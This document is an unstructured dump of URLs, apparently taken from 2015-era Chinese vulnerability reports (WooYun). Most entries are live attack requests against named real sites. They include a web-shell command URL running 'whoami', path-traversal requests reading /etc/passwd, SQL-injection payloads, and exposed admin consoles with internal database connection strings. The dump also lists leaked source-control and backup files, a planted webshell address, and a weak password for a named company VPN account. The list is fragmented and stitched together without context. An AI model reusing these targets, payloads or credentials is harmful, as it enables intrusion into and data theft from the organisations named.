http://wxtest.efunds.com.cn:7777/is/cmd.jsp?pwd=023&cmd=whoami http://180.96.63.19:8684/ebus/security/auth/login.do http://www.yamaha.com.cn/news_events/list_cpzx.html?category=19 IP:103.231.145.27 http://s.wanda.cn http://s.wanda.cn/MergeToPay/20150719/xxx.aspx,20150719目录不存在,这算是修复了么 http://124.238.219.61/system/index.php/Wanda/Floor/index/token/ http://60.10.61.161/,这个完全不知道什么,每天都有那么几条数据,你们正常的业务?暴漏了个内网ip:http://10.77.131.13/?actionType=equipmentid http://www.ccsa.org.cn/organization/intro.php?org=ASTAP http://www.ccsa.org.cn/organization/index.php3?category_id=3 http://www.ccsa.org.cn/tc/meeting.php?meeting_id=5163 http://www.ccsa.org.cn/peixun/pxresult.php3?VTI-GROUP=0&name=1&term=1&unit=&start_date=&dead_date=&cert_start_date=&cert_dead_date=&B1=1 http://www.bsoft.com.cn/ http://www.yileyoo.com/ http://www.yileyoo.com/news_detail%22%20AND%203*2*1%3d6%20AND%20%22000PpsT%22%3d%22000PpsT/117.html http://www.eims.hc360.com/jsp/cn/manage/groupdisplay.jsp?err=invalid%20param http://www.eims.hc360.com/console是出不来登录界面的,需要换成ip来登录 http://118.194.32.146/console http://jp.eims.hc360.com/ http://us.eims.hc360.com/ 
http://e-eyes.huicong.com/ ttp://wooyun.org/bugs/wooyun-2015-0127352通过爆破OA系统可获得完整员工邮箱地址。 http://mail.cstm.org.cn/coremail/同样可以爆破获得敏感信息,可获取完整组织架构、人员信息,发送接收邮件等敏感操作 http://221.239.121.25:8081//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.ipospal.com/ http://140.207.82.206:5001/pm/logout.do http://140.207.82.206:5001/cK/foot.jsp http://wangxiao.nbclz.com/admin.php http://www.zxd.com/activity/selectDwActiveList?createTimeParam=¤tPage=2&pageSize=6 www.xgrb.cn,对应219.138.202.5 http://219.138.202.14:7001/newsedit/batman/Login.jsp http://219.138.202.14:7001/console http://219.138.202.14:7001/key/a.jsp http://online.suning.com/console/Service/commissionGoods/pageCommissionGoods http://piaofang.maoyan.com/utils/proxy.shtml?source=https://www.baidu.com/s?wd=ip&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=monline_5_dg&rsv_enter=1&rsv_sug3=1&rsv_sug1=1&rsv_sug2=0&inputT=865&rsv_sug4=865 http://www.cbeis.zju.edu.cn/zjswyxgc/readtitle.php?id_xuehui=55 http://**.**.**.**/bugs/wooyun-2015-0113060而发 http://**.**.**.**/webschool/News/ClassNews/class_link.jsp?schoolId=1&classId=x201405&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=10001906&classId=Y201401&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=10001495&classId=x201406&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=1&classId=x201404&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=1 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=10001500&classId=&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_bjjj.jsp?classId=x201205 http://**.**.**.**/News/ClassNews/class_bjjj.jsp?classId=x201405 http://**.**.**.**/News/ClassNews/class_bjjj.jsp?classId=Y201202 http://**.**.**.**/webschool/News/ClassNews/class_bjjj.jsp?classId=x201408 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=x201205 http://**.**.**.**/webschool/News/ClassNews/class_user.jsp?classId=x201404 
http://**.**.**.**/News/ClassNews/class_user.jsp?classId=E201402 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=x201001 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=x201213 http://**.**.**.**/webschool/News/ClassNews/class_list.jsp?classId=x201408&typeId=clas04 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=x201406&typeId=clas02 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=x201202&typeId=clas0301 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=Y201302&typeId=clas0104 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=x200909&typeId=clas0304 http://**.**.**.**/webschool/News/ClassNews/news_list.jsp?typeId=clas0104 http://**.**.**.**/News/ClassNews/news_list.jsp?typeId=clas01 http://**.**.**.**/News/ClassNews/news_list.jsp?typeId=clas01 http://**.**.**.**/News/ClassNews/news_list.jsp?typeId=clas0201 http://**.**.**.**/News/News/ClassNews/news_list.jsp?typeId=clas01 http://online.suning.com/console/Service/monitor/pageGroup http://bang.liba.com/decorate/delicacy/album/home?style=0 http://www.hnfyxh.cn/framework/ua http://hl.pay.joy.cn/searchresult.aspx?keyword= http://www.tophr.net/magazine/magazine_index.asp?id=699 http://common.sc.sina.com.cn/vote/list.php?callback=?&limit=100&p=1&pid=8956&sort=1&updown=asc site:super.lvmama.com http://baolai.hz.letv.com/php/videonum.php?callback=?&id= http://www.trjcn.com/login/forget.html http://**.**.**/login/forget.htmltype=mobile&code=77556660d3df821a2f1d2ace043ed2f78fdb92 http://sjb.licaike.hexun.com/.svn/entries https://e.cmbchina.com/CmbBank_EHome/UI/RegUser/Public/ForgetPassword.aspx http://newoa.phfund.com.cn/ http://61.144.227.35/main/gb/adminhall/result1.jsp http://http://61.144.227.35/main/gb/adminhall/szzwresult.jsp www.rinnai.com.cn/support/guestbook/ www.rinnai.com.cn/admincp/passport/login/ http://bjjj.baoji.gov.cn/web/jgdt/Info.aspx?newid=3601&id=104 http://124.202.134.41:8080/LMS/flex/FTLogin.html# https://zh.essence.com.cn/kess/SMSSendServlet.ka 
http://by.486g.com/loginAction!initTrueGuest.action http://**.**.**.**/Web/KnowledgePoints.aspx?PLTagID=3 http://**.**.**.**:8090/wsbgt/Web/KnowledgePoints.aspx?PLTagID=3 http://**.**.**.**:106/adksvod/web/KnowledgePoints.aspx?PLTagID=3 http://mail.sd-si.cn/ http://www.zhenfund.com/Home/Index/category/id/4 http://email.vips100.com/edm/edms/editor.php?id=-1 http://www.finawin.cn/Website/plan/plancase_list.aspx?casetype=1 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/online&page=/B2BRegister.do&actionType=saveinit http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=497%20and%201=1(贵州省黔剧院) http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=876 http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=878 http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=880 http://www.civa.cc/forum.php?mod=alliance&do=memberunit https://mail.phfund.com.cn/owa/ http://www.lntl.hrss.gov.cn:8030/console/ http://www.lntl.hrss.gov.cn:8030/jmxroot/jmxroot.jsp jdbc:oracle:thin:@172.17.0.1:1521:orcl http://wooyun.org/bugs/wooyun-2010-0117740 http://www.lepumedical.com/ http://www.lepumedical.com/admin/login.php www.lepumedical.com/uploads/file/20150720/201507200107175e1.php http://www.cartel.tcl.com/carfriweb/friend/login?downprepath=http%3A%2F%2Ftclcar.com%2Fmgresource%2Fimg&deskpath=http%3A%2F%2Fwww.cartel.tcl.com%2Fcarfriweb&paperFile=chelian&validataCodeBoolean=true&path=http%3A%2F%2Fwww.cartel.tcl.com%2Fhttpresource%2Fposrecord%2F&music_path=http%3A%2F%2Fwww.cartel.tcl.com%2Fhttpresource%2Fposrecord%2F&managerpath=http%3A%2F%2Fwww.cartel.tcl.com%2Fcwebresource&MapKey=http%3A%2F%2Fapp.mapabc.com%2Fapis%3Ft%3Djavascriptmap%26v%3D3.1.1%26key%3Da8c528ab2e94f161571b6c0a511803656208a2ad86c1cf706a72076735e0d4987321b6cb025ef283&restype=1 http://221.214.179.228:5000/ http://61.150.109.61:81/ http://124.129.7.215/ http://124.129.7.216/ https://trade.jyvpfund.com/console/ https://trade.jyvpfund.com/jmxroot/jmxroot.jsp 
jdbc:oracle:thin:@10.***** http://account.aigame100.com/PwdFind/LoginName.aspx http://v.gffunds.com.cn:80/ https://ihome.cofco.com/dana-na/auth/url_default/welcome.cgi,中粮集团内网,账号lxia存在弱密码123456,里面包含OA系统、中粮快讯、公告通知、中粮通讯录等等敏感信息。 http://c3.cofco.com/index.php,中粮营养健康研究院知识门户,里面又包括不少系统,还能看到员工以及专家详细资料(照片、电话、邮箱等)。 http://124.234.102.6:7001/console/ http://124.234.102.6:7001/jmxroot/jmxroot.jsp is:ybsimisbkl jdbc:oracle:thin:@172.16.0.200:1521/ybzhouggfw http://180.169.84.55 http://180.169.84.54 http://59.151.39.85 http://59.151.39.93 http://180.169.84.48/ui/ http://city2011.house.sina.com.cn/?uid=1&act=myphoto&ctrl=gallery http://www.huway.com/user_cardmanage?id=5 http://qz.yundasys.com:7777/amb/login.php http://zfb.yundasys.com/wd_yfk/login.php http://nbsw.yundasys.com:81/dh/w/login.php http://auth.yundasys.com:11372/ydauth/login.html http://route.yundasys.com:11362/route/login.html http://car.yundasys.com:81/yd_khd/login.php https://github.com/qyer-dc/wz-api/blob/adab27929bfc43a5ee2946a635d4cbe159630c0e/z_app/src/applicationContext-mail.xml https://member.hexindai.com/password/verifyusername.html http://chat.rising.com.cn/webcsc/ens/ashx/GetCity.ashx?pid=9 http://www.xiji.com/passport-lost.html http://**.**.**.**/vj/Employer/Register.aspx?guid= http://**.**.**.**/Employer/Register.aspx?guid= http://**.**.**.**/vj/Employer/Register.aspx?guid= http://**.**.**.**/Employer/Register.aspx?guid= http://**.**.**.**/Employer/Register.aspx?guid= http://**.**.**.**:8090/vj/Employer/Register.aspx?guid= http://www.xiji.com/cart-shipping_confirm.html http://os.open.com.cn/ http://115.182.41.187/Home/Login http://m.360bzl.com/category.php?id=1&sort=goods_id&page=2 http://www.360bzl.com/bzl_shopadmin/index.php https://github.com/druphliu/oauth/blob/bbb48b1a689d0cf5a4613944671d7e2d6e085638/protected/extensions/Utils.php http://**.**.**.**/bugs/wooyun-2010-0101555 http://UCG.dooland.com/ http://zqb.dooland.com/ http://zgdy.dooland.com/ http://zgzk.dooland.com/ http://zfsd.dooland.com/ 
http://zito.dooland.com/ http://zxyxbook.dooland.com/ http://zongyiweekly.dooland.com/ http://UCG.dooland.com/ http://sqlmap.org http://58.213.148.10:81/login.aspx http://58.213.148.10:81/apply/Base_Info_add.aspx http://**.**.**.** ttp://www.jhjyjt.cn/jhjyjt.cn.rar http://www.jiumei.com/account/user_updateUser.dhtml?m=&name=%25u6211%25u6211%25u6211&homeAddress=%25u5317%25u4EAC%25u4E1C%25u57CE%25u533A&email=test_cumt%40126.com&sex=1&provincial=001002&city=001002001&county=null&zipcode=111111&mobile=13611111111&homePhone=5632365 http://www.youxigu.com/www.youxigu.com.tar.gz http://uc.tuanche.com http://uc.tuanche.com/account/modifyInfo http://price.ziroom.com.cn/?_p=../../../../../../../../../../etc/passwd%00.jpg http://140.206.53.222:7001/console/ http://140.206.53.222:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 http://218.22.1.68:7001/netrep/login.jsp http://218.22.1.68:7001/console/login/LoginForm.jsp http://218.22.1.68:7001/JspSpyJDK5/JspSpyJDK5.jsp http://218.22.1.68:7001/ceshi/ http://106.37.172.5:8080/entrance.do http://124.193.148.50:8012/Web/Page/Account/Login.aspx http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/IndexAskq.aspx/searchlist.aspx?class=3&key=1 http://**.**.**.**/p-717667098.html http://**.**.**.**/bugs/wooyun-2010-044787 http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/ http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**:81/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.** 
http://110.90.120.49:8080/etrading/ http://www.picooc.com http://www.picooc.com/index.php?s=/home/address/save.html http://oa.phsy.com.cn:8080/defaultroot/ http://61.172.251.231:8161/admin/ http://**.**.**/console/ http://www.bssgjj.com/jmxroot/jmxroot.jsp http://www.xiangguo.com http://www.xiangguo.com/customer/address http://space.fang.com/?c=setting&a=face。 http://hrm.cmge.com/ http://licensing.hp.com/slm/orangePortal/downloadFile?filename=WEB-INF/web.xml http://licensing.hp.com/slm/orangePortal/downloadFile?filename=index.jsp http://webware.hp.com/slm/orangePortal/downloadFile?filename=WEB-INF/web.xml http://webware.hp.com/slm/orangePortal/downloadFile?filename=index.jsp http://bi.diandao.org/login http://bbs.ehang.com/uc_server.zip http://aboutus.cits.cn/cits/admin/index.jsp http://wooyun.org/bugs/wooyun-2015-0122816 http://wooyun.org/bugs/wooyun-2015-0122766 http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059101847 http://218.241.156.50/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://180.169.84.48/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://180.169.84.55/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://epos.jxlife.com.cn/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://gdxt.hxlife.com/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://218.241.156.50/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://218.241.156.50/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd URL:http://job.pingan.com/ http://idc.jb51.net http://idc.jb51.net/style/info/newview.asp?id=317 http://idc.jb51.net/style/info/newview.asp?id=317 xsst.sinaapp.com/poc/mail_idc.js# 
now:1437401206072,rootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/",cacheRootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/",cacheJsPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/js/",cacheCssPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/css/",cacheImgPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/img/ http://www.enableq.com/enableq/WebAPI/Down.php?path=Li4vUGVyVXNlckRhdGEvLi4vQ29uZmlnLw==&file=Y29uZmlnLnBocA== http://www.enableq.com/enableq/WebAPI/Down.php?path=Li4vUGVyVXNlckRhdGEvLi4vQ29uZmlnLw==&file=Y29uZmlnLnBocA== http://oa.sxpmg.com/defaultroot/login.jsp http://pm.dhcc.com.cn/DHCPMWeb/ http://112.111.44.94:8080/bankCenter/ www.epie.com.tw/html/jobs.asp http://ski-ana.nwpu.edu.cn/bookingbrow.aspx?ID=2565 http://**.**.**.**:8085/Handler/carorroom/ValidCode.ashx?t=NaN&no=1 http://**.**.**.**/Handler/carorroom/ValidCode.ashx?t=NaN&no=1 http://**.**.**.**/Handler/carorroom/ValidCode.ashx?t=NaN&no=1 http://223.85.25.43:7001/gawscx/index.jsp http://223.85.25.43:7001/console http://223.85.25.43:7001/ad http://218.2.31.75:7001/console http://110.249.165.54:7001/netrep/index.jsp http://pic.ziroom.com/oa/iframes/targetReachedCount.html?cache=1422023780531 http://pic.ziroom.com/oa/iframes/perfromanceTop.html?cache=1426254386672 http://hw.gpsisp.com/ http://srm.hikvision.com/Admin/LogOn.html http://www.ctfund.com/message-web/messagesJSON/jsonadd http://oa.gzzb.gd.cn/qy/module/qy/qyxxll/basicInfoview.jsp?result=login<PAToken=MTQ2ODUqVXNlcjNmOGMwYjQwOGU4YioyMjUqUjFGcmFtZXdvcms0LjEuMA== http://oa.gzzb.gd.cn/qy/module/qy/qyxxll/basicInfoview.jsp?result=login<PAToken=MTEzNDYqVXNlcjdkOTEzZWU5OGVjNCoyMjUqUjFGcmFtZXdvcms0LjEuMA== http://qdgl.cttha.com/reportAnalyse/AnalyseReport/index.jsp?pagenum=2&company_id=60&time=20141106070045&token=2bee4a96d05788687c9e4e9d522c8981ab7c02c2&dataId=qc&userid=601&funcid=700017&rep_id=700017 http://passport.xx5.com/findpass/ 
http://passport.xx5.com/findpass/index.php?a=save_findbyemailconfirm http://www.trendshome.cn/u/list.html?uid=1979 http://myee.jichu.chaoxing.com/ http://222.74.140.54:7001/defaultroot/login.jsp http://218.85.77.165/ http://218.85.77.165/console http://victim:8080/C:%5C/ http://www.nsfocus.net/vulndb/8829 https://www.rapid7.com/resources/advisories/R7-0024.jsp http://www.ahljj.gov.cn/ http://www.ahljj.gov.cn/C:%5C/ http://www.ahljj.gov.cn/D:%5C/ http://www.ahljj.gov.cn/E:%5C/ http://www.nasco.com.cn/ http://tao.admin5.com/yy/install/index.php Webshell:http://tao.admin5.com/yy/cnmh.php http://lian.admin5.com/p.php http://lian.admin5.com/phpmyadmin/ http://113.107.0.77/ http://wx.114menhu.cn/wechat-back/html/main.html http://cksp.eol.cn/scholar_search.php?proftype=9&name=&sex=&do=search&bb_sear.x=25&bb_sear.y=10 http://pop.pindao.com/.git/config http://101.227.241.2:81/pubemg http://bbs.ehang.com/uc_server.zip ftp://183.63.91.4/ ftp://183.63.91.4/backupdata/ ftp://183.63.91.4/backupdata/IT日常运维/ ftp://183.63.91.4/backupdata/万山移动硬盘数据恢复/C/我的文件(2010年以后)/ http://mobile.ztgame.com/.svn/entries http://sygsl.cn/gsl/login.php?gotopage=%2Fgsl%2Findex.php http://124.128.232.167:7001/console/ http://124.128.232.173:7001/console http://124.128.232.247:7004/lpcx/ http://124.128.232.167:7010/autoclaim-srs/LoginServlet http://124.128.232.173:7001/jmxroot/jmxroot.jsp http://124.128.232.167:7001/jmxroot/jmxroot.jsp http://124.128.232.247:7004/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.1.3.26:1521:orcl jdbc:oracle:thin:@10.1.3.52:1521:TESTDEV jdbc:oracle:thin:@10.1.3.1:1521:oradb jdbc:oracle:thin:@10.1.3.1:1521:oradb http://member.ync365.com/register/save)userName处存在SQL注入风险。 http://www.5fengshou.com/sell/info/17923)存在伪静态sql注入,其他Id同样存在。 http://hr.pocib.com/Admin/UpA01.aspx http://hr.pocib.com http://180.153.142.34 http://www.hebdgjh.com.cn/qzlx/sub.asp?cid=0001 http://www.hebdgjh.com.cn/sub.asp?CID=002000010001 http://www.hebdgjh.com.cn/dgsgk%5Csub.asp?CID=00070003 
http://www.hebdgjh.com.cn/dgsgk/sgk022.asp?CID=00040001 http://www.hebdgjh.com.cn/dgsgk/sgk023.asp?CID=0002 http://www.hebdgjh.com.cn/dgsgk/sgk02.asp?CID=00030003 http://www.hebdgjh.com.cn/dgsgk/sgk02.asp?CID=0001 http://www.hebdgjh.com.cn/qzlx/sub.asp?cid=0001 http://www.16wifi.com/cms/login.php http://wx.50cms.com/admin/login.aspx hmms.haier.net/appReport/searchReportZdzgKsdCenterInit.action http://a100.aeonlife.com.cn/indexlis.jsp http://www.ebn100.com/customize/nwc_user_enterprise/login/login.html http://**.**.**.**:8083/lslp/WHOut/Notice/NoticeList.aspx http://**.**.**.**:8090/lslp/WHOut/Notice/NoticeList.aspx http://**.**.**.**:8080//lslp/WHOut/Notice/NoticeList.aspx http://**.**.**.**:8083/lslp/Sys/View/Notice/ViewNotice.aspx?Id=00000024 http://**.**.**.**:8090/lslp/Sys/View/Notice/ViewNotice.aspx?Id=00000024 http://**.**.**.**:8080/lslp/Sys/View/Notice/ViewNotice.aspx?Id=00000024 http://**.**.**.**:8083/lslp/WHOut/List.aspx?Region=LG http://**.**.**.**:8090/lslp/WHOut/List.aspx?Region=LG http://**.**.**.**:8080/lslp/WHOut/List.aspx?Region=LG http://www.dv10000.com/reportAction.do?method=reportList&departmentId=1 http://cms.diyicai.com/ https://query.thfund.com.cn//thtopic.do?type=-1 http://itsm.baiyunairport.com/test.aspx http://v.huatu.com/htnews/plus/view.php?aid=15323 http://sem.sau.edu.cn/view_list-single.php?id=97 http://a.sxjx.org/login.aspx http://hr.hikvision.com/users/resetPassword.htm?userLogin=153466XXXX@qq.com&secret=4d5d6ef56f1d4aafca653b90beaf9820 http://www.wlmqcg.com.cn/Goods/ViewMemberGood_Info.jsp?good_id=169 http://oa.tempus.cn/ https://github.com/lidudu/sendMail/blob/9b99e90f7c3712036a92b5f674a2d4197885c9c7/src/com/util/mail/TestMail.java http://118.186.217.122/ http://118.186.217.122/cgi-bin/test-cgi http://10.4.24.136/source/ http://m1.yea.im/1pA.png http://m1.yea.im/1pB.png we.renren-inc.com/tongxunlu/ http://we.renren-inc.com/tongxunlu/addressListNote.php?id=1027* https://119.90.56.205/ http://admin.gfxiong.com/login?location=/ 
http://w.gfxiong.com/wx/lst/product http://w.gfxiong.com/m/login#/m/my http://tjzb.bjes.gov.cn/ReportProcess/ShowErrorpage.aspx?Tab_Type_ID=1&unit_tab_id=79758441X http://114.80.86.70/ http://114.80.86.70/console http://114.80.86.70/cK/foot.jsp http://kszx.jlu.edu.cn/kscj/chaxun_result.php http://www.hebgy.gov.cn/company/index.php?categoryid=29&category=&keyword=&kind2=&pages=1 http://icapture.yoloho.com/Admin/Index/login http://180.97.69.103/querywindow.php?token=8c67d878f4bc809f2a69902fd13de08d&db=xxsw&table=jieqi_system_users&init=1 http://www.multigold.com.cn/ http://member.multigold.com.cn/account/memberInfo_saveMemberAddress?newtime=1437460773098&isDefault=N&address1=%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&fullAddress=%E5%A4%A9%E6%B4%A5%E5%A4%A9%E6%B4%A5%E5%B8%82%E6%9C%9D%E9%98%B3%E5%8C%BA%E4%BA%94%E7%8E%AF%E9%87%8C%E5%B7%A6%E5%AE%B6%E5%BA%84%E3%80%81%E6%96%B0%E6%BA%90%E9%87%8C%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&post=111111&provinceId=12000000&cityId=12010000&areaId=11010200&streetId=11010203&consignee=%E5%95%8A%E5%AE%9E%E6%89%93%E5%AE%9E%E5%A4%A7%E5%B8%88%E7%9A%84&mobile1=13333333331&isDelete=N http://124.193.96.238:8012/userlist.php http://www.ctba.org.tw/download.php下载文件时发现会导向http://www.ctba.org.tw/func_file_download.php?filename=%25E6%2597%2585%25E5%25A4%2596%25E9%2581%25B8%25E6%2589%258B%25E7%25A9%25BA%25E7%2599%25BD%25E5%258D%2594%25E8%25AD%25B0%25E6%259B%25B8%25E8%258B%25B1%25E6%2596%2587%25E7%2589%2588.doc http://www.ctba.org.tw/func_file_download.php?filename=func_file_download.php http://www.ctba.org.tw/func_file_download.php?filename=../func_file_download.php https://www.gzjkp2p.com/querytraninput.do http://m.jb51.net/admin/Article_show.asp?id=69781 http://www.108.com.tw:80/main04/members/search_list_members_parent_case.php?act=memberno&image=&memberno=1 http://system.wecash.net/wecash-system/system/index/ http://www.yongning.gov.cn:8091/ynzw/GscOrgan/index.action存在命令执行漏洞 
http://sp.cncico.com:8093/kingeeanc/fileDownloadAction.action存在命令执行漏洞 http://forum.open.com.cn/admin/home/ http://jxilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=6&STUDENT_TYPE=2&RANDCODE=696c http://hbilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2 http://ilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm http://hnilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7 http://182.92.9.185:8080/.svn/entries http://61.144.227.35/main/gb/adminhall/szzwresult.jsp bbs.zjstv.com/wx http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OutPortal_CFD//OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/outportal/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/bugs/wooyun-2015-0127911 http://ugc.gs.baofeng.com/login?target=%2Fadmin%2Fuser%2Fapply http://cg.csrgc.com.cn/ http://119.18.208.31/ http://221.4.104.217/console http://221.4.104.196/console http://221.4.104.222/console http://221.4.104.222/biz/eDrive/productEAInfo.jsp http://221.4.104.222/aaa/3.jsp http://59.37.35.58/admin/protect http://zzhr.foxconn.com/siteserver/forgetPassword.aspx http://tw.heuet.edu.cn/TP_News_ye.aspx?ID=22208 http://job.efunds.com.cn/solr/#/ http://www.yaolan.com/topic/topic.7z www.ylhrss.gov.cn http://www.ylhrss.gov.cn/login.action https://www.yiban.cn/user/forget/index http://www.yiban.cn/user/reg/checkMobileAjax http://www.yiban.cn/user/forget/modifyPwAjax 
http://www.kaihuiqu.com/ http://weibo.com/kaihuiqu http://211.139.201.108:81/gdpay/ http://www.qphhyx.com:8009/ http://of××ce.leyou.com https://www.91ri.org/13471.html www.gxczzx.gov.cn http://www.gxczzx.gov.cn/news_list.php?q=2&id=68 http://www.wecash.net/solr/#/ http://**.**.**.**/bugs/wooyun-2015-0127088/trace/d839643b0a8ac106f941bc03414adcf1 http://**.**.**.**/module/zwgk/viewzwxx2.action?websiteid=818&name=flfg&pagenum=1 http://**.**.**.**:86/jxpj/pj_njsd.asp http://**.**.**.**:86//jxpj/pj_njsd.asp http://**.**.**.**//jxpj/pj_njsd.asp http://**.**.**.**/jxpj/pj_njsd.asp http://**.**.**.**/jxpj/pj_xbsd.asp http://**.**.**.**/jxpj/pj_xbsd.asp http://**.**.**.**:86/jxpj/pj_xbsd.asp http://**.**.**.**:86/jxpj/pj_xbsd.asp http://123.15.36.218:8009/yunying/login.action存在命令执行漏洞 http://k3shop.k3cloud.kingdee.com/ http://k3shop.k3cloud.kingdee.com/sitemap.xml www.yczfgjj.com http://116.213.210.136:8888/GlobalWebService.asmx?WSDL http://tempuri.org/GetCount http://116.213.210.136:8888/GlobalWebService.asmx?WSDL http://oa.yhfund.com.cn:8888/logon.action http://oa.yhfund.com.cn/ http://www.tongshifu.com/index.php/forgetpwd/index http://open.haodai.com:80/ http://**.**.**.**:8080/workfield_rg/dirManage_listDirManage.do?fid=E91BAE201BBC4EE09F7D7F1ABB286BE7&deptId=JT&ssdw=%E4%BA%A4%E9%80%9A%E5%B1%80 http://**.**.**.**:8080/workfield_tz/dirManage_listDirManage.do?fid=E608CA06E0704EF49178C17C2E951FF4&deptId=NTS&ssdw=%E5%8F%91%E6%94%B9%E5%A7%94&sign=1 http://**.**.**.**:8080/workfield_hm/dirManage_listDirManage.do?fid=3DEF79130F874CC5B03F639419BC5779&deptId=GT&ssdw=%E5%9B%BD%E5%9C%9F%E5%B1%80 http://114.255.209.12:9989/OL/ http://114.255.209.12:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.160.2.172:1521:topadj"/ http://wyeth.youku.com/admin/admin.php http://wyeth.youku.com/pma/ http://wyeth.youku.com/pma/setup/index.php https://msdn.microsoft.com/en-us/library/ms534622.aspx) http://www.ancc.org.cn/ http://219.232.117.244:7001 http://219.232.117.244:7001/bds 
http://219.232.117.244:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@192.168.30.94:1521/orcl jdbc:oracle:thin:@192.168.30.94:1521/orcl http://wf.nbjj.gov.cn/ http://www.bestv.com.cn/index.php?a=lists&movie_special=1&c=index&tv_category=1&catid=27&m=content&tv_type=1&order=id&channel=2&modelid=11 http://cyjwb.jmu.edu.cn/admin/ASPAdmin_A.asp http://202.108.9.16/logs/ http://202.108.9.127/logs/ http://202.108.16.145:8081/admin/ http://202.108.16.145:8081/manager/ http://202.108.16.145:8090/admin/ http://202.108.16.145:8090/manager/ http://202.108.16.145:9090/manager/ http://202.108.16.145:9090/admin/ http://202.108.16.221:8090/admin/ http://202.108.16.221:8090/manager/ http://202.108.16.221:9090/admin/ http://202.108.16.221:9090/manager/ http://202.108.9.127/.svn/entries www.wooyun.org/bugs/wooyun-2015-0117373 www.7393555.com www.ykgps.net www.gpsfree.net:8000/njnk/ www.7136666.com/ api.ilvxing.com/api/morder/cancel POST:partnerID=ANDROID&version=2.4.0.0&cause=1&unix=20150722&versionCode=2440&sign=【登陆手机端的SIGN】&orderID=70131&plant=YingYongBao http://oa.cr213.com/yyoa/checkWaitdo.jsp?userID=1 http://log.gw.com.cn/ http://210.22.8.98/ http://210.22.8.98/user/manageUser.action?deviceName=&serialNo=&userName=admin http://www.lionfund.com.cn/chatmain.do?id=2403 lbs.bjtelecom.net/besweb/ api.ilvxing.com/api/morder/detail url:http://www.jzhb.gov.cn:8086/jzepb/login.jsp 